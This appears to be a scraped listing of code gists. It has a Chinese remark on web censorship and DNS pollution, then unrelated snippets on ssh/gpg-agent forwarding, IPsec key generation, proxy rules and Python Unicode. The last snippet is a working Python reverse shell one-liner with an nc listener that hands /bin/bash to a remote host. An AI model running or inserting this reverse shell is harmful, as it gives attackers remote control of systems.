目前整个互联网环境,被破坏最严重地部分,是 Web 服务体验。当直接破坏难以实现时,就会从流程链的上下游着手,如:DNS 污染。
其它地互联网服务类型,例如:邮件,可能小部分会受到 Web 服务上下游破坏地余震,但整体上基本不受影响。
#!/usr/bin/env python | |
"""Simple HTTP Server With Upload. | |
This module builds on BaseHTTPServer by implementing the standard GET | |
and HEAD requests in a fairly straightforward manner. | |
""" |
#!/bin/bash -e | |
remote="$1@$2" | |
echo -ne '\e]0;wait... '"$remote"'\a' | |
eval $(/usr/bin/ssh-pageant -r -a "/tmp/.ssh-pageant-$USERNAME") | |
localdir="$(cygpath -u "$APPDATA")/gnupg" | |
extrasock="$localdir/S.gpg-agent.extra" # file containing "PORT\nNONCE" | |
rdir='$HOME/.gnupg' # remote prefix | |
rinsock="$rdir/S.gpg-agent" # listen on this socket on server |
#!/bin/bash | |
function load_var { | |
eval $(cat ${1} <( echo -e '\nset -o posix;set\n') | env - bash --noprofile --norc --posix | sed 's/^/'$2'_/') | |
if [ -n "$IF_IPSEC6" ]; then | |
PEER_ENDPOINT=$PEER_ENDPOINT6 | |
SELF_ENDPOINT=$SELF_ENDPOINT6 | |
fi | |
} |
#!/bin/bash | |
function gen { | |
dd if=/dev/urandom bs=1 count=10000 2>/dev/null | tr -dc a-f0-9 | fold -w $1 | sed 's/^/0x/' | head -n 1 | |
} | |
spi=`gen 8` | |
reqid=`gen 8` | |
auth_key=`gen 64` | |
enc_key=`gen 64` |
// Use Gists to store code you would like to remember later on | |
console.log(window); // log the "window" object to the console |
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
""" 测试 Python 在什么情况下会输出 Unicode 字符串 | |
需要首先理解在 Python 中 Unicode 类型和 Unicode 字符串指的不是同一个东西。 | |
Unicode 字符串是 str 类型,但它的值的表现形式是 Unicode 编码形式。 | |
""" | |
def printt(str): |
[Proxy] | |
WIFI = direct, interface=en2 | |
VPN = direct, interface=utun0 | |
[Rule] | |
DOMAIN-SUFFIX,yach.me,WIFI | |
FINAL,VPN |
# http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | |
# on the CLIENT, run the following: | |
# nc -l 12345 | |
# on the SERVER, start the "reverse shell" | |
python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')" 192.168.2.176 12345 | |
# now go to the CLIENT, listen on port 12345 for incoming shell connections | |
nc -l 12345 |